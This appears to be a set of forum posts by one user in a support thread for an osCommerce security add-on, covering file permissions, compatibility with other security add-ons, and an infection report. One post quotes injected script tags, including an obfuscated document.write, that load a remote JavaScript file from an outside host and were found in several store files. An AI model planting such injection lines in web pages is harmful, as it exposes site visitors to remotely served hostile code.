pablito21050

Hi and thanks for the contribution, I installed it and after pressing the CHECK BUTTON: There is a big list of .php files that as default have 644 like permission, and the contribution suggest me to change them to 755 to see "OK". Definitely I'm doing something wrong but it seems that the contribution ask me (action required) in a opposed way to what I read in the forum. All .php files are at 644 and directories are 755 but the contribuition ask me to change a lot of .php files to 755. What I'm doing wrong? I need your advise.

Thanks celextel for understanding; I have already put the site offline and changed the FTP password. We are cleaning all infected files but I need to find a solution, I'll contact you by PM.

Yes, I mean I didn't get any warning message.. I have already open a thread on your forum.

Hello, I just found a virus on my site: includes/general.js line 192 document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>'); includes/languages/english/index.php also german, spanish and italian line 42 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> admin/index.php line 12 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> my_admin_name/index.php line 124 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> and so on, more than 20 files infected; the security mod will not prevent this.

ok, sorry for that.

question 2) tool/banned ip/ remove (your banned IP)

Oh ok, thanks for your answer.

Hello and thanks for your contribution; I have installed and testing and it is working great, THANKS! I have just 1 small questions. I believe you said that your add on doesn't work with Anti-XSS but I'm reading your "read me" html -Finally the ANTI Cross Site Scripting Attacks from Pixclinic on June 2008 is an easy to implement addon that will help your shop by adding a short and simple set of rules into the .htaccess file. ANTI Cross Site Scripting attacks http://addons.oscommerce.com/info/6044 should I install it? I mean should I add these lines to the .htaccess?

Thank you very much, I appreciate your explanation and suggestion. I'll reply here when all will be installed to let you know. Regards,

Hello, I'm installing a new store these days and I want to install your add on. Please tell me the compability with the others major security add ons like: -Security Pro -SiteMonitor -IP trap -htaccess protection -Anti XSS Maybe someone will be superfluous once istalled your add-on, may you suggest me a right formula to protect the new site? Thanks.